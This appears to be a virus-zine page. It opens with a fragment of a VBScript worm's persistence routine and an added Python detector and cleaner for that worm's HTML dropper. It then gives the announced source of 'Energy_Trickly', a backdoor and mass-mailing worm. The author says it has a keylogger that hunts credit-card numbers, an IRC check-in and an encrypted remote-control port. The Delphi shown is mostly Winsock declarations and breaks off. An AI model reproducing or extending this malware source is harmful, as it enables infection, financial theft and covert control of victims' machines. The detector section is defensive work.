Cle2+"\RunServices\"+Nom1,repwin+"\"+Nom2+".vbs" Set FichDer=fso.CreateTextFile(repwin+"\"+Nom2+".vbs") FichDer.write Script Fichder.close end if loop end sub Function GenerNom() 
Nom="" Randomize Timer do:h1=int(rnd*8):loop until h1>2 for lettre=1 to h1 do:h2=int(rnd*25):loop until h2>0 Nom=Nom+Chr(h2+66) next GenerNom=Nom End Function''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
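
A defender's view of the HTML routine in the listing above, as an added example that is not part of the zine or of Energy's code: it recognises the script block the listing prepends to .htm/.html/.hta files, strips it to recover the original page, and matches the two registry paths the listing uses. The function names, the cleanup loop and the constructed sample block (abbreviated and inert) are assumptions of this example; the marker strings and registry paths are the ones in the listing.

```python
"""Detect and strip the HTML dropper block written by the listing above (added example)."""
import re
from typing import NamedTuple

FIRST_LINE = "<script language=vbscript>"
# Strings the listing writes at the top of .htm/.html/.hta files.
MARKERS = {
    "drops_vbs": re.compile(r'createtextfile\("c:\\sundance\.vbs"\)', re.I),
    "payload_array": re.compile(r"^dim vbfich\(\d+\)", re.I | re.M),
    "runs_vbs": re.compile(r'wshshell\.run "c:\\sundance\.vbs"', re.I),
}
PAYLOAD_LINE = re.compile(r"^vbfich\(\d+\)= ", re.I | re.M)
# The listing spells its own closing tag as "</"+"scr"+"ipt>", so the first literal
# </script> in an infected file closes the dropper block, not the payload.
END_TAG = re.compile(r"</script>[ \t]*\r?\n?", re.I)
# Registry paths used by the listing (Cle1 and Cle2).
REG_IOCS = (
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Worm",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentSunDance",
)


class Finding(NamedTuple):
    infected: bool
    hits: tuple         # marker names found in the leading block
    payload_lines: int  # count of vbfich(n)= assignments in that block
    block_end: int      # offset just past the block's </script> line, 0 if clean


def inspect_html(text: str) -> Finding:
    """Report whether text opens with the dropper block."""
    first_line = text.split("\n", 1)[0].strip().lower()
    end = END_TAG.search(text)
    if first_line != FIRST_LINE or end is None:
        return Finding(False, (), 0, 0)
    block = text[: end.end()]
    hits = tuple(name for name, rx in MARKERS.items() if rx.search(block))
    # Require every marker: a page may legitimately open with a VBScript block.
    if len(hits) != len(MARKERS):
        return Finding(False, hits, 0, 0)
    return Finding(True, hits, len(PAYLOAD_LINE.findall(block)), end.end())


def disinfect(text: str, max_blocks: int = 50):
    """Return (cleaned_text, blocks_removed).

    The original page is written straight after the block, so cutting at
    block_end restores it. A file the routine processed more than once
    carries stacked blocks, so strip until the top of the file is clean.
    """
    removed = 0
    while removed < max_blocks:
        finding = inspect_html(text)
        if not finding.infected:
            break
        text = text[finding.block_end:]
        removed += 1
    return text, removed


def scan_bytes(data: bytes) -> Finding:
    # Latin-1 keeps byte 163, the quote substitute in payload lines, intact.
    return inspect_html(data.decode("latin-1"))


def registry_hits(exported_paths):
    """Filter exported registry key paths down to those under the listing's keys."""
    prefixes = tuple(p.lower() for p in REG_IOCS)
    return [p for p in exported_paths if p.lower().startswith(prefixes)]


# Constructed sample: abbreviated, inert block (no fso/WshShell objects,
# placeholder payload lines) followed by a constructed original page.
SAMPLE_BLOCK = "\r\n".join([
    "<script language=vbscript>",
    "<!--",
    'set fich=fso.createtextfile("C:\\SunDance.vbs")',
    "dim vbfich(10000)",
    "vbfich(1)= \"' constructed placeholder line\"",
    'vbfich(2)= ""',
    'WshShell.run "C:\\SunDance.vbs"',
    "-->",
    "</script>",
]) + "\r\n"
SAMPLE_ORIGINAL = "<html><body>hello</body></html>\r\n"

if __name__ == "__main__":
    twice = SAMPLE_BLOCK + SAMPLE_BLOCK + SAMPLE_ORIGINAL
    print(inspect_html(twice))
    print(disinfect(twice))
    print(registry_hits([REG_IOCS[1] + r"\Run\CDEFG"]))
```

The cleaner only removes a leading block that carries all three markers, so a page that merely opens with its own VBScript block is left as it is.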

sources

Trickly Energy ; Until last month 10/02 i started a New Project (Trickly) ; for any Comments of us ; mail me to SST@Hablas.com ; bye..and I wish you a New Virulent Year ; ; Energy ; ; ;Source code of the Backdoor ->Energy_Trickly_Backdoor.dpr ;Source code of the Worm ->Energy_Trickly_Worm.dpr ; ;Little description: :The worm function scan Outlook and Eudora address book file and after send email. I don't know know if that work with the last versions. ;There is a thread which connect to an irc for see who is online. ;The port 4662(self via Edonkey ect.) is open only when the victim is online and the Wsock32 api call are encrypted and the protocol of the backdoor too. ;The keylogger was design mainly for detect if a 13,16 digit code is tape on the keyboard and after put a flag in the registry (it's surely the big need of money who push me to put this function inside :-). ;The other function are: registry access, file upload/download, windows process, etc.. ; ; Energy_Trickly_Backdoor.dpr program vv; uses Windows; const {winsock const} FD_SETSIZE = 64; IOCPARM_MASK = $7f; IOC_VOID = $20000000; IOC_OUT = $40000000; IOC_IN = $80000000; IOC_INOUT = (IOC_IN or IOC_OUT); FIONREAD = IOC_OUT or { get # bytes to read } ((Longint(SizeOf(Longint)) and IOCPARM_MASK) shl 16) or (Longint(Byte('f')) shl 8) or 127; FIONBIO = IOC_IN or { set/clear non-blocking i/o } ((Longint(SizeOf(Longint)) and IOCPARM_MASK) shl 16) or (Longint(Byte('f')) shl 8) or 126; FIOASYNC = IOC_IN or { set/clear async i/o } ((Longint(SizeOf(Longint)) and IOCPARM_MASK) shl 16) or (Longint(Byte('f')) shl 8) or 125; // Protocols } IPPROTO_IP = 0; { dummy for IP } IPPROTO_ICMP = 1; { control message protocol } IPPROTO_IGMP = 2; { group management protocol } IPPROTO_GGP = 3; { gateway^2 (deprecated) } IPPROTO_TCP = 6; { tcp } IPPROTO_PUP = 12; { pup } IPPROTO_UDP = 17; { user datagram protocol } IPPROTO_IDP = 22; { xns idp } IPPROTO_ND = 77; { UNOFFICIAL net disk proto } IPPROTO_RAW = 255; { raw IP packet } 
IPPROTO_MAX = 256; IPPORT_RESERVED = 1024; INADDR_ANY = $00000000; INADDR_LOOPBACK = $7F000001; INADDR_BROADCAST = $FFFFFFFF; INADDR_NONE = $FFFFFFFF; WSADESCRIPTION_LEN = 256; WSASYS_STATUS_LEN = 128; TF_DISCONNECT = $01; TF_REUSE_SOCKET = $02; TF_WRITE_BEHIND = $04; IP_OPTIONS = 1; IP_MULTICAST_IF = 2; { set/get IP multicast interface } IP_MULTICAST_TTL = 3; { set/get IP multicast timetolive } IP_MULTICAST_LOOP = 4; { set/get IP multicast loopback } IP_ADD_MEMBERSHIP = 5; { add an IP group membership } IP_DROP_MEMBERSHIP = 6; { drop an IP group membership } IP_TTL = 7; { set/get IP Time To Live } IP_TOS = 8; { set/get IP Type Of Service } IP_DONTFRAGMENT = 9; { set/get IP Don't Fragment flag } IP_DEFAULT_MULTICAST_TTL = 1; { normally limit m'casts to 1 hop } IP_DEFAULT_MULTICAST_LOOP = 1; { normally hear sends if a member } IP_MAX_MEMBERSHIPS = 20; { per socket; must fit in one mbuf } SOCK_STREAM = 1; { stream socket } SOCK_DGRAM = 2; { datagram socket } SOCK_RAW = 3; { raw-protocol interface } SOCK_RDM = 4; { reliably-delivered message } SOCK_SEQPACKET = 5; { sequenced packet stream } SO_DEBUG = $0001; { turn on debugging info recording } SO_ACCEPTCONN = $0002; { socket has had listen() } SO_REUSEADDR = $0004; { allow local address reuse } SO_KEEPALIVE = $0008; { keep connections alive } SO_DONTROUTE = $0010; { just use interface addresses } SO_BROADCAST = $0020; { permit sending of broadcast msgs } SO_USELOOPBACK = $0040; { bypass hardware when possible } SO_LINGER = $0080; { linger on close if data present } SO_OOBINLINE = $0100; { leave received OOB data in line } SO_DONTLINGER = $ff7f; SO_SNDBUF = $1001; { send buffer size } SO_RCVBUF = $1002; { receive buffer size } SO_SNDLOWAT = $1003; { send low-water mark } SO_RCVLOWAT = $1004; { receive low-water mark } SO_SNDTIMEO = $1005; { send timeout } SO_RCVTIMEO = $1006; { receive timeout } SO_ERROR = $1007; { get error status and clear } SO_TYPE = $1008; { get socket type } // SO_CONNDATA = $7000; // SO_CONNOPT 
= $7001; // SO_DISCDATA = $7002; // SO_DISCOPT = $7003; // SO_CONNDATALEN = $7004; // SO_CONNOPTLEN = $7005; // SO_DISCDATALEN = $7006; // SO_DISCOPTLEN = $7007; // SO_OPENTYPE = $7008; // SO_SYNCHRONOUS_ALERT = $10; // SO_SYNCHRONOUS_NONALERT = $20; // SO_MAXDG = $7009; // SO_MAXPATHDG = $700A; // SO_UPDATE_ACCEPT_CONTEXT = $700B; // SO_CONNECT_TIME = $700C; TCP_NODELAY = $0001; TCP_BSDURGENT = $7000; // AF_UNSPEC = 0; { unspecified } AF_UNIX = 1; { local to host (pipes, portals) } AF_INET = 2; { internetwork: UDP, TCP, etc. } // AF_IMPLINK = 3; { arpanet imp addresses } // AF_PUP = 4; { pup protocols: e.g. BSP } // AF_CHAOS = 5; { mit CHAOS protocols } // AF_IPX = 6; { IPX and SPX } // AF_NS = 6; { XEROX NS protocols } // AF_ISO = 7; { ISO protocols } // AF_OSI = AF_ISO; { OSI is ISO } // AF_ECMA = 8; { european computer manufacturers } // AF_DATAKIT = 9; { datakit protocols } // AF_CCITT = 10; { CCITT protocols, X.25 etc } // AF_SNA = 11; { IBM SNA } // AF_DECnet = 12; { DECnet } // AF_DLI = 13; { Direct data link interface } // AF_LAT = 14; { LAT } // AF_HYLINK = 15; { NSC Hyperchannel } // AF_APPLETALK = 16; { AppleTalk } // AF_NETBIOS = 17; { NetBios-style addresses } // AF_VOICEVIEW = 18; { VoiceView } // AF_FIREFOX = 19; { FireFox } // AF_UNKNOWN1 = 20; { Somebody is using this! 
} // AF_BAN = 21; { Banyan } // AF_MAX = 22; // PF_UNSPEC = AF_UNSPEC; PF_UNIX = AF_UNIX; PF_INET = AF_INET; // PF_IMPLINK = AF_IMPLINK; // PF_PUP = AF_PUP; // PF_CHAOS = AF_CHAOS; // PF_NS = AF_NS; // PF_IPX = AF_IPX; // PF_ISO = AF_ISO; // PF_OSI = AF_OSI; // PF_ECMA = AF_ECMA; // PF_DATAKIT = AF_DATAKIT; // PF_CCITT = AF_CCITT; // PF_SNA = AF_SNA; // PF_DECnet = AF_DECnet; // PF_DLI = AF_DLI; // PF_LAT = AF_LAT; // PF_HYLINK = AF_HYLINK; // PF_APPLETALK = AF_APPLETALK; // PF_VOICEVIEW = AF_VOICEVIEW; // PF_FIREFOX = AF_FIREFOX; // PF_UNKNOWN1 = AF_UNKNOWN1; // PF_BAN = AF_BAN; // PF_MAX = AF_MAX; SOL_SOCKET = $ffff; {options for socket level } SOMAXCONN = 5;{ Maximum queue length specifiable by listen. } MSG_OOB = $1; {process out-of-band data } MSG_PEEK = $2; {peek at incoming message } MSG_DONTROUTE = $4; {send without using routing tables } MSG_MAXIOVLEN = 16; MSG_PARTIAL = $8000; {partial send or recv for message xport } MAXGETHOSTSTRUCT = 1024; FD_READ = $01; FD_WRITE = $02; FD_OOB = $04; FD_ACCEPT = $08; FD_CONNECT = $10; FD_CLOSE = $20; WSABASEERR = 10000; WSAEINTR = (WSABASEERR+4); WSAEBADF = (WSABASEERR+9); WSAEACCES = (WSABASEERR+13); WSAEFAULT = (WSABASEERR+14); WSAEINVAL = (WSABASEERR+22); WSAEMFILE = (WSABASEERR+24); WSAEWOULDBLOCK = (WSABASEERR+35); WSAEINPROGRESS = (WSABASEERR+36); WSAEALREADY = (WSABASEERR+37); WSAENOTSOCK = (WSABASEERR+38); WSAEDESTADDRREQ = (WSABASEERR+39); WSAEMSGSIZE = (WSABASEERR+40); WSAEPROTOTYPE = (WSABASEERR+41); WSAENOPROTOOPT = (WSABASEERR+42); WSAEPROTONOSUPPORT = (WSABASEERR+43); WSAESOCKTNOSUPPORT = (WSABASEERR+44); WSAEOPNOTSUPP = (WSABASEERR+45); WSAEPFNOSUPPORT = (WSABASEERR+46); WSAEAFNOSUPPORT = (WSABASEERR+47); WSAEADDRINUSE = (WSABASEERR+48); WSAEADDRNOTAVAIL = (WSABASEERR+49); WSAENETDOWN = (WSABASEERR+50); WSAENETUNREACH = (WSABASEERR+51); WSAENETRESET = (WSABASEERR+52); WSAECONNABORTED = (WSABASEERR+53); WSAECONNRESET = (WSABASEERR+54); WSAENOBUFS = (WSABASEERR+55); WSAEISCONN = (WSABASEERR+56); 
WSAENOTCONN = (WSABASEERR+57); WSAESHUTDOWN = (WSABASEERR+58); WSAETOOMANYREFS = (WSABASEERR+59); WSAETIMEDOUT = (WSABASEERR+60); WSAECONNREFUSED = (WSABASEERR+61); WSAELOOP = (WSABASEERR+62); WSAENAMETOOLONG = (WSABASEERR+63); WSAEHOSTDOWN = (WSABASEERR+64); WSAEHOSTUNREACH = (WSABASEERR+65); WSAENOTEMPTY = (WSABASEERR+66); WSAEPROCLIM = (WSABASEERR+67); WSAEUSERS = (WSABASEERR+68); WSAEDQUOT = (WSABASEERR+69); WSAESTALE = (WSABASEERR+70); WSAEREMOTE = (WSABASEERR+71); WSAEDISCON = (WSABASEERR+101); WSASYSNOTREADY = (WSABASEERR+91); WSAVERNOTSUPPORTED = (WSABASEERR+92); WSANOTINITIALISED = (WSABASEERR+93); WSAHOST_NOT_FOUND = (WSABASEERR+1001); HOST_NOT_FOUND = WSAHOST_NOT_FOUND; WSATRY_AGAIN = (WSABASEERR+1002); TRY_AGAIN = WSATRY_AGAIN; WSANO_RECOVERY = (WSABASEERR+1003); NO_RECOVERY = WSANO_RECOVERY; WSANO_DATA = (WSABASEERR+1004); NO_DATA = WSANO_DATA; WSANO_ADDRESS = WSANO_DATA; NO_ADDRESS = WSANO_ADDRESS; EWOULDBLOCK = WSAEWOULDBLOCK; EINPROGRESS = WSAEINPROGRESS; EALREADY = WSAEALREADY; ENOTSOCK = WSAENOTSOCK; EDESTADDRREQ = WSAEDESTADDRREQ; EMSGSIZE = WSAEMSGSIZE; EPROTOTYPE = WSAEPROTOTYPE; ENOPROTOOPT = WSAENOPROTOOPT; EPROTONOSUPPORT = WSAEPROTONOSUPPORT; ESOCKTNOSUPPORT = WSAESOCKTNOSUPPORT; EOPNOTSUPP = WSAEOPNOTSUPP; EPFNOSUPPORT = WSAEPFNOSUPPORT; EAFNOSUPPORT = WSAEAFNOSUPPORT; EADDRINUSE = WSAEADDRINUSE; EADDRNOTAVAIL = WSAEADDRNOTAVAIL; ENETDOWN = WSAENETDOWN; ENETUNREACH = WSAENETUNREACH; ENETRESET = WSAENETRESET; ECONNABORTED = WSAECONNABORTED; ECONNRESET = WSAECONNRESET; ENOBUFS = WSAENOBUFS; EISCONN = WSAEISCONN; ENOTCONN = WSAENOTCONN; ESHUTDOWN = WSAESHUTDOWN; ETOOMANYREFS = WSAETOOMANYREFS; ETIMEDOUT = WSAETIMEDOUT; ECONNREFUSED = WSAECONNREFUSED; ELOOP = WSAELOOP; ENAMETOOLONG = WSAENAMETOOLONG; EHOSTDOWN = WSAEHOSTDOWN; EHOSTUNREACH = WSAEHOSTUNREACH; ENOTEMPTY = WSAENOTEMPTY; EPROCLIM = WSAEPROCLIM; EUSERS = WSAEUSERS; EDQUOT = WSAEDQUOT; ESTALE = WSAESTALE; EREMOTE = WSAEREMOTE; winsocket = 'vqlgn55&mfg'; //wsock32.dll {messages 
windows const}
  WM_NULL = $0000;
  WM_CREATE = $0001;
  WM_DESTROY = $0002;
  WM_MOVE = $0003;
  WM_SIZE = $0005;
  WM_ACTIVATE = $0006;
  WM_SETFOCUS = $0007;
  WM_KILLFOCUS = $0008;
  WM_ENABLE = $000A;
  WM_SETREDRAW = $000B;
  WM_SETTEXT = $000C;
  WM_GETTEXT = $000D;
  WM_GETTEXTLENGTH = $000E;
  WM_PAINT = $000F;
  WM_CLOSE = $0010;
  WM_QUERYENDSESSION = $0011;
  WM_QUIT = $0012;
  WM_QUERYOPEN = $0013;
  WM_ERASEBKGND = $0014;
  WM_SYSCOLORCHANGE = $0015;
  WM_ENDSESSION = $0016;
  WM_SYSTEMERROR = $0017;
  WM_SHOWWINDOW = $0018;
  WM_CTLCOLOR = $0019;
  WM_WININICHANGE = $001A;
  WM_SETTINGCHANGE = WM_WININICHANGE;
  WM_DEVMODECHANGE = $001B;
  WM_ACTIVATEAPP = $001C;
  WM_FONTCHANGE = $001D;
  WM_TIMECHANGE = $001E;
  WM_CANCELMODE = $001F;
  WM_SETCURSOR = $0020;
  WM_MOUSEACTIVATE = $0021;
  WM_CHILDACTIVATE = $0022;
  WM_QUEUESYNC = $0023;
  WM_GETMINMAXINFO = $0024;
  WM_PAINTICON = $0026;
  WM_ICONERASEBKGND = $0027;
  WM_NEXTDLGCTL = $0028;
  WM_SPOOLERSTATUS = $002A;
  WM_DRAWITEM = $002B;
  WM_MEASUREITEM = $002C;
  WM_DELETEITEM = $002D;
  WM_VKEYTOITEM = $002E;
  WM_CHARTOITEM = $002F;
  WM_SETFONT = $0030;
  WM_GETFONT = $0031;
  WM_QUERYDRAGICON = $0037;
  WM_COMPAREITEM = $0039;
  WM_COMPACTING = $0041;
  WM_COMMNOTIFY = $0044; { obsolete in Win32}
  WM_WINDOWPOSCHANGING = $0046;
  WM_WINDOWPOSCHANGED = $0047;
  WM_POWER = $0048;
  WM_COPYDATA = $004A;
  WM_CANCELJOURNAL = $004B;
  WM_NOTIFY = $004E;
  WM_INPUTLANGCHANGEREQUEST = $0050;
  WM_INPUTLANGCHANGE = $0051;
  WM_TCARD = $0052;
  WM_HELP = $0053;
  WM_USERCHANGED = $0054;
  WM_NOTIFYFORMAT = $0055;
  WM_CONTEXTMENU = $007B;
  WM_STYLECHANGING = $007C;
  WM_STYLECHANGED = $007D;
  WM_DISPLAYCHANGE = $007E;
  WM_GETICON = $007F;
  WM_SETICON = $0080;
  WM_NCCREATE = $0081;
  WM_NCDESTROY = $0082;
  WM_NCCALCSIZE = $0083;
  WM_NCHITTEST = $0084;
  WM_NCPAINT = $0085;
  WM_NCACTIVATE = $0086;
  WM_GETDLGCODE = $0087;
  WM_NCMOUSEMOVE = $00A0;
  {
  WM_NCLBUTTONDOWN = $00A1;
  WM_NCLBUTTONUP = $00A2;
  WM_NCLBUTTONDBLCLK = $00A3;
  WM_NCRBUTTONDOWN = $00A4;
  WM_NCRBUTTONUP = $00A5;
  WM_NCRBUTTONDBLCLK = $00A6;
  WM_NCMBUTTONDOWN = $00A7;
  WM_NCMBUTTONUP = $00A8;
  WM_NCMBUTTONDBLCLK = $00A9;
  }
  WM_KEYFIRST = $0100;
  WM_KEYDOWN = $0100;
  WM_KEYUP = $0101;
  WM_CHAR = $0102;
  WM_DEADCHAR = $0103;
  WM_SYSKEYDOWN = $0104;
  WM_SYSKEYUP = $0105;
  WM_SYSCHAR = $0106;
  WM_SYSDEADCHAR = $0107;
  WM_KEYLAST = $0108;
  WM_INITDIALOG = $0110;
  WM_COMMAND = $0111;
  WM_SYSCOMMAND = $0112;
  WM_TIMER = $0113;
  WM_HSCROLL = $0114;
  WM_VSCROLL = $0115;
  WM_INITMENU = $0116;
  WM_INITMENUPOPUP = $0117;
  WM_MENUSELECT = $011F;
  WM_MENUCHAR = $0120;
  WM_ENTERIDLE = $0121;
  WM_CTLCOLORMSGBOX = $0132;
  WM_CTLCOLOREDIT = $0133;
  WM_CTLCOLORLISTBOX = $0134;
  WM_CTLCOLORBTN = $0135;
  WM_CTLCOLORDLG = $0136;
  WM_CTLCOLORSCROLLBAR = $0137;
  WM_CTLCOLORSTATIC = $0138;
  WM_MOUSEFIRST = $0200;
  WM_MOUSEMOVE = $0200;
  WM_LBUTTONDOWN = $0201;
  WM_LBUTTONUP = $0202;
  WM_LBUTTONDBLCLK = $0203;
  WM_RBUTTONDOWN = $0204;
  WM_RBUTTONUP = $0205;
  WM_RBUTTONDBLCLK = $0206;
  WM_MBUTTONDOWN = $0207;
  WM_MBUTTONUP = $0208;
  WM_MBUTTONDBLCLK = $0209;
  WM_MOUSEWHEEL = $020A;
  WM_MOUSELAST = $020A;
  WM_PARENTNOTIFY = $0210;
  WM_ENTERMENULOOP = $0211;
  WM_EXITMENULOOP = $0212;
  WM_NEXTMENU = $0213;
  WM_SIZING = 532;
  WM_CAPTURECHANGED = 533;
  WM_MOVING = 534;
  WM_POWERBROADCAST = 536;
  WM_DEVICECHANGE = 537;
  {
  WM_IME_STARTCOMPOSITION = $010D;
  WM_IME_ENDCOMPOSITION = $010E;
  WM_IME_COMPOSITION = $010F;
  WM_IME_KEYLAST = $010F;
  WM_IME_SETCONTEXT = $0281;
  WM_IME_NOTIFY = $0282;
  WM_IME_CONTROL = $0283;
  WM_IME_COMPOSITIONFULL = $0284;
  WM_IME_SELECT = $0285;
  WM_IME_CHAR = $0286;
  WM_IME_KEYDOWN = $0290;
  WM_IME_KEYUP = $0291;
  WM_MDICREATE = $0220;
  WM_MDIDESTROY = $0221;
  WM_MDIACTIVATE = $0222;
  WM_MDIRESTORE = $0223;
  WM_MDINEXT = $0224;
  WM_MDIMAXIMIZE = $0225;
  WM_MDITILE = $0226;
  WM_MDICASCADE = $0227;
  WM_MDIICONARRANGE = $0228;
  WM_MDIGETACTIVE = $0229;
  WM_MDISETMENU = $0230;
  WM_ENTERSIZEMOVE = $0231;
  WM_EXITSIZEMOVE = $0232;
  WM_DROPFILES = $0233;
  WM_MDIREFRESHMENU = $0234;
  }
  WM_MOUSEHOVER = $02A1;
  WM_MOUSELEAVE = $02A3;
  WM_CUT = $0300;
  WM_COPY = $0301;
  WM_PASTE = $0302;
  WM_CLEAR = $0303;
  WM_UNDO = $0304;
  WM_PAINTCLIPBOARD = $0309;
  WM_PRINT = 791;
  WM_PRINTCLIENT = 792;
  WM_HANDHELDFIRST = 856;
  WM_HANDHELDLAST = 863;
  WM_PENWINFIRST = $0380;
  WM_PENWINLAST = $038F;
  WM_COALESCE_FIRST = $0390;
  WM_COALESCE_LAST = $039F;
  WM_DDE_FIRST = $03E0;
  WM_DDE_INITIATE = WM_DDE_FIRST + 0;
  WM_DDE_TERMINATE = WM_DDE_FIRST + 1;
  WM_DDE_ADVISE = WM_DDE_FIRST + 2;
  WM_DDE_UNADVISE = WM_DDE_FIRST + 3;
  WM_DDE_ACK = WM_DDE_FIRST + 4;
  WM_DDE_DATA = WM_DDE_FIRST + 5;
  WM_DDE_REQUEST = WM_DDE_FIRST + 6;
  WM_DDE_POKE = WM_DDE_FIRST + 7;
  WM_DDE_EXECUTE = WM_DDE_FIRST + 8;
  WM_DDE_LAST = WM_DDE_FIRST + 8;
  WM_APP = $8000;
  WM_USER = $0400;
  UM_KEYHIT = WM_USER + 7; //keylog

const
  ERROR = '|ERROR:';
  ALLDONE = 'All done.';
  //VER_PLATFORM_WIN32s = 0;
  //V/ER_PLATFORM_WIN32_WINDOWS = 1;
  //VER_PLATFORM_WIN32_NT = 2;
  Count : integer = 0;
  lpzClassName = 'Explorer ';
  lpzWindowsName = 'Explorer ';
  WM_MY_SOCK_MESSAGE = WM_USER+2;
  LFCR = #10#13;

  { File open modes }
  fmOpenRead = $0000;
  fmOpenWrite = $0001;
  fmOpenReadWrite = $0002;
  fmShareCompat = $0000;
  fmShareExclusive = $0010;
  fmShareDenyWrite = $0020;
  fmShareDenyRead = $0030;
  fmShareDenyNone = $0040;

  { File attribute constants }
  faReadOnly = $00000001;
  faHidden = $00000002;
  faSysFile = $00000004;
  faVolumeID = $00000008;
  faDirectory = $00000010;
  faArchive = $00000020;
  faAnyFile = $0000003F;

{prog type}
type
  PWinPassword = ^TWinPassword;
  TWinPassword = record
    EntrySize: Word;
    ResourceSize: Word;
    PasswordSize: Word;
    EntryIndex: Byte;
    EntryType: Byte;
    PasswordC: Char;
  end;

{winsock type}
type
  u_char = Char;
  u_short = Word;
  u_int = Integer;
  u_long = Longint;
  TSocket = u_int;

type
  PFDSet = ^TFDSet;
  TFDSet = packed record
    fd_count: u_int;
    fd_array: array[0..FD_SETSIZE-1] of TSocket;
  end;

  PTimeVal = ^TTimeVal;
  TTimeVal = packed record
    tv_sec: Longint;
    tv_usec: Longint;
  end;

type
  PHostEnt = ^THostEnt;
  THostEnt = packed record
    h_name: PChar;
    h_aliases: ^PChar;
    h_addrtype: Smallint;
    h_length: Smallint;
    case Byte of
      0: (h_addr_list: ^PChar);
      1: (h_addr: ^PChar)
  end;

  PNetEnt = ^TNetEnt;
  TNetEnt =
  packed record
    n_name: PChar;
    n_aliases: ^PChar;
    n_addrtype: Smallint;
    n_net: u_long;
  end;

  PServEnt = ^TServEnt;
  TServEnt = packed record
    s_name: PChar;
    s_aliases: ^PChar;
    s_port: Smallint;
    s_proto: PChar;
  end;

  PProtoEnt = ^TProtoEnt;
  TProtoEnt = packed record
    p_name: PChar;
    p_aliases: ^Pchar;
    p_proto: Smallint;
  end;

type
  SunB = packed record
    s_b1, s_b2, s_b3, s_b4: u_char;
  end;

  SunW = packed record
    s_w1, s_w2: u_short;
  end;

  PInAddr = ^TInAddr;
  TInAddr = packed record
    case integer of
      0: (S_un_b: SunB);
      1: (S_un_w: SunW);
      2: (S_addr: u_long);
  end;

  PSockAddrIn = ^TSockAddrIn;
  TSockAddrIn = packed record
    case Integer of
      0: (sin_family: u_short;
          sin_port: u_short;
          sin_addr: TInAddr;
          sin_zero: array[0..7] of Char);
      1: (sa_family: u_short;
          sa_data: array[0..13] of Char)
  end;

type
  PWSAData = ^TWSAData;
  TWSAData = packed record
    wVersion: Word;
    wHighVersion: Word;
    szDescription: array[0..WSADESCRIPTION_LEN] of Char;
    szSystemStatus: array[0..WSASYS_STATUS_LEN] of Char;
    iMaxSockets: Word;
    iMaxUdpDg: Word;
    lpVendorInfo: PChar;
  end;

  PTransmitFileBuffers = ^TTransmitFileBuffers;
  TTransmitFileBuffers = packed record
    Head: Pointer;
    HeadLength: DWORD;
    Tail: Pointer;
    TailLength: DWORD;
  end;

type
  { Structure used by kernel to store most addresses. }
  PSockAddr = ^TSockAddr;
  TSockAddr = TSockAddrIn;

  { Structure used by kernel to pass protocol information in raw sockets. }
  PSockProto = ^TSockProto;
  TSockProto = packed record
    sp_family: u_short;
    sp_protocol: u_short;
  end;

type
  { Structure used for manipulating linger option. }
  PLinger = ^TLinger;
  TLinger = packed record
    l_onoff: u_short;
    l_linger: u_short;
  end;

const
  INVALID_SOCKET = TSocket(NOT(0));
  SOCKET_ERROR = -1;

{type window message record}
type
  PMessage = ^TMessage;
  TMessage = record
    Msg: Cardinal;
    case Integer of
      0: (
        WParam: Longint;
        LParam: Longint;
        Result: Longint);
      1: (
        WParamLo: Word;
        WParamHi: Word;
        LParamLo: Word;
        LParamHi: Word;
        ResultLo: Word;
        ResultHi: Word);
  end;

  { Common message format records }
  TWMNoParams = record
    Msg: Cardinal;
    Unused: array[0..3] of Word;
    Result: Longint;
  end;

  TWMKey = record
    Msg: Cardinal;
    CharCode: Word;
    Unused: Word;
    KeyData: Longint;
    Result: Longint;
  end;

  TWMMouse = record
    Msg: Cardinal;
    Keys: Longint;
    case Integer of
      0: (
        XPos: Smallint;
        YPos: Smallint);
      1: (
        Pos: TSmallPoint;
        Result: Longint);
  end;

  TWMWindowPosMsg = record
    Msg: Cardinal;
    Unused: Integer;
    WindowPos: PWindowPos;
    Result: Longint;
  end;

  TWMScroll = record
    Msg: Cardinal;
    ScrollCode: Smallint; { SB_xxxx }
    Pos: Smallint;
    ScrollBar: HWND;
    Result: Longint;
  end;

  { Message records }
  TWMActivate = record
    Msg: Cardinal;
    Active: Word; { WA_INACTIVE, WA_ACTIVE, WA_CLICKACTIVE }
    Minimized: WordBool;
    ActiveWindow: HWND;
    Result: Longint;
  end;

  TWMActivateApp = record
    Msg: Cardinal;
    Active: BOOL;
    ThreadId: Longint;
    Result: Longint;
  end;

  TWMAskCBFormatName = record
    Msg: Cardinal;
    NameLen: Word;
    Unused: Word;
    FormatName: PChar;
    Result: Longint;
  end;

  TWMCancelMode = TWMNoParams;

  TWMChangeCBChain = record
    Msg: Cardinal;
    Remove: HWND;
    Next: HWND;
    Result: Longint;
  end;

  TWMChar = TWMKey;

  TWMCharToItem = record
    Msg: Cardinal;
    Key: Word;
    CaretPos: Word;
    ListBox: HWND;
    Result: Longint;
  end;

  TWMChildActivate = TWMNoParams;

  TWMChooseFont_GetLogFont = record
    Msg: Cardinal;
    Unused: Longint;
    LogFont: PLogFont;
    Result: Longint;
  end;

  TWMClear = TWMNoParams;
  TWMClose = TWMNoParams;

  TWMCommand = record
    Msg: Cardinal;
    ItemID: Word;
    NotifyCode: Word;
    Ctl: HWND;
    Result: Longint;
  end;

  TWMCompacting = record
    Msg: Cardinal;
    CompactRatio: Longint;
    Unused: Longint;
    Result: Longint;
  end;

  TWMCompareItem = record
    Msg: Cardinal;
    Ctl: HWnd;
    CompareItemStruct: PCompareItemStruct;
    Result: Longint;
  end;

  TWMCopy = TWMNoParams;

  TWMCopyData = record
    Msg: Cardinal;
    From: HWND;
    CopyDataStruct: PCopyDataStruct;
    Result: Longint;
  end;

  { ?? WM_CLP_LAUNCH, WM_CPL_LAUNCHED }

  TWMCreate = record
    Msg: Cardinal;
    Unused: Integer;
    CreateStruct: PCreateStruct;
    Result: Longint;
  end;

  TWMCtlColor = record
    Msg: Cardinal;
    ChildDC: HDC;
    ChildWnd: HWND;
    Result: Longint;
  end;

  TWMCtlColorBtn = TWMCtlColor;
  TWMCtlColorDlg = TWMCtlColor;
  TWMCtlColorEdit = TWMCtlColor;
  TWMCtlColorListbox = TWMCtlColor;
  TWMCtlColorMsgbox = TWMCtlColor;
  TWMCtlColorScrollbar = TWMCtlColor;
  TWMCtlColorStatic = TWMCtlColor;

  TWMCut = TWMNoParams;

  TWMDDE_Ack = record
    Msg: Cardinal;
    PostingApp: HWND;
    case Word of
      WM_DDE_INITIATE: (
        App: Word;
        Topic: Word;
